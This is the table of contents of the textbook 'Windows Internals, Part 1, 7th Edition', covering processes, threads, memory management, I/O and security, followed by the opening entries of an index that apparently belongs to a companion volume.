Executive . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
Kernel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75
Hardware abstraction layer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
Device drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .82
System processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .88
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .99
Chapter 3  Processes and jobs    101
Creating a process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .101
CreateProcess* functions arguments. . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
Creating Windows modern processes . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
Creating other kinds of processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .104
Process internals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105
Protected processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113
Protected Process Light (PPL) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115
Third-party PPL support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119
Minimal and Pico processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120
Minimal processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120
Pico processes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121
Trustlets (secure processes). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123
Trustlet structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123
Trustlet policy metadata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124
Trustlet attributes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
System built-in Trustlets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
Trustlet identity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126
Isolated user-mode services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 127
Trustlet-accessible system calls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Flow of CreateProcess . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
Stage 1: Converting and validating parameters and flags . . . . . . . . . 131
Stage 2: Opening the image to be executed . . . . . . . . . . . . . . . . . . . . . 135
Stage 3: Creating the Windows executive process object . . . . . . . . . 138
Stage 4: Creating the initial thread and its stack and context . . . . .144
Stage 5: Performing Windows subsystem–specific initialization . . 146
Stage 6: Starting execution of the initial thread . . . . . . . . . . . . . . . . . . 148
Stage 7: Performing process initialization in the context
of the new process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
Terminating a process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154
Image loader . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
Early process initialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
DLL name resolution and redirection . . . . . . . . . . . . . . . . . . . . . . . . . . . 160
Loaded module database . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .164
Import parsing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 168
Post-import process initialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 170
SwitchBack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 171
API Sets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173
Jobs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
Job limits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177
Working with a job . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
Nested jobs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
Windows containers (server silos) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
Chapter 4  Threads    193
Creating threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
Thread internals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
Data structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
Birth of a thread . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .206
Examining thread activity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .207
Limitations on protected process threads . . . . . . . . . . . . . . . . . . . . . . . 212
Thread scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 214
Overview of Windows scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 214
Priority levels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 215
Thread states . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .223
Dispatcher database . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .228
Quantum . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 231
Priority boosts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .238
Context switching . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .255
Scheduling scenarios . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .256
Idle threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .260
Thread suspension . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .264
(Deep) freeze . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .264
Thread selection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .266
Multiprocessor systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .268
Thread selection on multiprocessor systems . . . . . . . . . . . . . . . . . . . .283
Processor selection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .284
Heterogeneous scheduling (big.LITTLE) . . . . . . . . . . . . . . . . . . . . . . . . .286
Group-based scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .287
Dynamic fair share scheduling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .289
CPU rate limits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .292
Dynamic processor addition and replacement . . . . . . . . . . . . . . . . . .295
Worker factories (thread pools) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .297
Worker factory creation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .298
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .300
Chapter 5  Memory management    301
Introduction to the memory manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 301
Memory manager components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .302
Large and small pages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .303
Examining memory usage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .305
Internal synchronization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .308
Services provided by the memory manager . . . . . . . . . . . . . . . . . . . . . . . . . . .309
Page states and memory allocations . . . . . . . . . . . . . . . . . . . . . . . . . . . . 310
Commit charge and commit limit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313
Locking memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314
Allocation granularity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 314
Shared memory and mapped files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 315
Protecting memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 317
Data Execution Prevention . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 319
Copy-on-write . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 321
Address Windowing Extensions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .323
Kernel-mode heaps (system memory pools) . . . . . . . . . . . . . . . . . . . . . . . . . .324
Pool sizes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .325
Monitoring pool usage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .327
Look-aside lists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
Heap manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .332
Process heaps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .333
Heap types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .334
The NT heap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .334
Heap synchronization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .334
The low-fragmentation heap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .335
The segment heap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .336
Heap security features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 341
Heap debugging features . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .342
Pageheap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .343
Fault-tolerant heap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .347
Virtual address space layouts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .348
x86 address space layouts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .349
x86 system address space layout . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .352
x86 session space . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .353
System page table entries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .355
ARM address space layout . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .356
64-bit address space layout . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .357
x64 virtual addressing limitations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .359
Dynamic system virtual address space management . . . . . . . . . . . . .359
System virtual address space quotas . . . . . . . . . . . . . . . . . . . . . . . . . . . .364
User address space layout . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .365
Address translation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
x86 virtual address translation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
Translation look-aside buffer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .377
x64 virtual address translation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .380
ARM virtual address translation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 381
Page fault handling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .383
Invalid PTEs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .384
Prototype PTEs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .385
In-paging I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .386
Collided page faults . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .387
Clustered page faults . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .387
Page files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .389
Commit charge and the system commit limit . . . . . . . . . . . . . . . . . . . .394
Commit charge and page file size . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .397
Stacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .398
User stacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .399
Kernel stacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 400
DPC stack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .401
Virtual address descriptors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .401
Process VADs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .402
Rotate VADs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .403
NUMA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 404
Section objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .405
Working sets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412
Demand paging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 413
Logical prefetcher and ReadyBoot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 413
Placement policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
Working set management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 417
Balance set manager and swapper . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 421
System working sets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .422
Memory notification events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .423
Contents of Windows Internals, Part 1, 7th Edition
857
Page frame number database . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .425
Page list dynamics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .428
Page priority . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .436
Modified page writer and mapped page writer . . . . . . . . . . . . . . . . . .438
PFN data structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440
Page file reservation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 443
Physical memory limits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 446
Windows client memory limits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .447
Memory compression . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 449
Compression illustration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .450
Compression architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .453
Memory partitions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .456
Memory combining . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .459
The search phase . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .460
The classification phase . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 461
The page combining phase . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .462
From private to shared PTE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .462
Combined pages release . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 464
Memory enclaves . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .467
Programmatic interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .468
Memory enclave initializations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .469
Enclave construction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .469
Loading data into an enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 471
Initializing an enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .472
Proactive memory management (SuperFetch) . . . . . . . . . . . . . . . . . . . . . . . .472
Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .473
Tracing and logging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .474
Scenarios . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .475
Page priority and rebalancing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .476
Robust performance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .478
ReadyBoost . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .479
ReadyDrive . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .480
Process reflection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .480
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .482
Chapter 6
I/O system
483
I/O system components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .483
The I/O manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .485
Typical I/O processing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .486
Interrupt Request Levels and Deferred Procedure Calls . . . . . . . . . . . . . . . .488
Interrupt Request Levels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .488
Deferred Procedure Calls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .490
Device drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .492
Types of device drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .492
Structure of a driver . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .498
Driver objects and device objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .500
Opening devices. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .507
I/O processing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 510
Types of I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 511
I/O request packets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 513
I/O request to a single-layered hardware-based driver. . . . . . . . . . .525
I/O requests to layered drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .533
Thread-agnostic I/O . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .536
I/O cancellation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .537
I/O completion ports . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 541
I/O prioritization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .546
Container notifications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .552
Driver Verifier . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .552
I/O-related verification options . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .554
Memory-related verification options . . . . . . . . . . . . . . . . . . . . . . . . . . .555
The Plug and Play manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .559
Level of Plug and Play support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .560
Device enumeration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 561
Device stacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .563
Driver support for Plug and Play . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .569
Plug-and-play driver installation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 571
General driver loading and installation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .575
Driver loading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .575
Driver installation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .577
The Windows Driver Foundation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .578
Kernel-Mode Driver Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .579
User-Mode Driver Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .587
The power manager . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .590
Connected Standby and Modern Standby . . . . . . . . . . . . . . . . . . . . . .594
Power manager operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .595
Driver power operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .596
Driver and application control of device power . . . . . . . . . . . . . . . . . .599
Power management framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .600
Power availability requests . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .602
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .603
Chapter 7
Security
605
Security ratings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .605
Trusted Computer System Evaluation Criteria . . . . . . . . . . . . . . . . . . .605
The Common Criteria . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .607
Security system components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .608
Virtualization-based security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 611
Credential Guard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 612
Device Guard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 617
Protecting objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 619
Access checks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 621
Security identifiers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .625
Virtual service accounts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .646
Security descriptors and access control . . . . . . . . . . . . . . . . . . . . . . . . .650
Dynamic Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .666
The AuthZ API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .666
Conditional ACEs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .667
Account rights and privileges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .668
Account rights . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .669
Privileges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .670
Super privileges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .675
Access tokens of processes and threads . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .677
Security auditing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .677
Object access auditing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .679
Global audit policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .682
Advanced Audit Policy settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .683
AppContainers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .684
Overview of UWP apps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .685
The AppContainer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .687
Logon . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 710
Winlogon initialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 711
User logon steps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 713
Assured authentication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 718
Windows Biometric Framework . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 719
Windows Hello . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 721
User Account Control and virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .722
File system and registry virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . .722
Elevation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .729
Exploit mitigations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .735
Process-mitigation policies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .735
Control Flow Integrity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .740
Security assertions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .752
Application Identification . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .756
AppLocker . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .757
Software Restriction Policies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .762
Kernel Patch Protection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .764
PatchGuard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .765
HyperGuard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .768
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .770
Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 771
Index
SYMBOLS
\ (root directory), 692
NUMBERS
32-bit handle table entry, 147
64-bit IDT, viewing, 34–35
A
AAM (Application Activation Manager), 244
ACL (access control list), displaying, 153–154
ACM (authenticated code module), 805–806
!acpiirqarb command, 49
ActivationObject object, 129
ActivityReference object, 129
address-based pushlocks, 201
address-based waits, 202–203
ADK (Windows Assessment and Deployment Kit), 421
administrative command prompt, opening, 253, 261
AeDebug and AeDebugProtected root keys, WER (Windows Error Reporting), 540
AES (Advanced Encryption Standard), 711
allocators, ReFS (Resilient File System), 743–745
ALPC (Advanced Local Procedure Call), 209
!alpc command, 224
ALPC message types, 211
ALPC ports, 129, 212–214
ALPC worker thread, 118
APC level, 40, 43, 62, 63, 65
!apciirqarb command, 48
APCs (asynchronous procedure calls), 61–66
APIC, and PIC (Programmable Interrupt Controller), 37–38
APIC (Advanced Programmable Interrupt Controller), 35–36
!apic command, 37
APIC Timer, 67
APIs, 690
\AppContainer NamedObjects directory, 160
AppContainers, 243–244
AppExecution aliases, 263–264
apps, activating through command line, 261–262. See also packaged applications
APT (Advanced Persistent Threats), 781
!arbiter command, 48
architectural system service dispatching, 92–95
\ArcName directory, 160
ARM32 simulation on ARM 64 platforms, 115
assembly code, 2
associative cache, 13
atomic execution, 207
attributes, resident and nonresident, 667–670
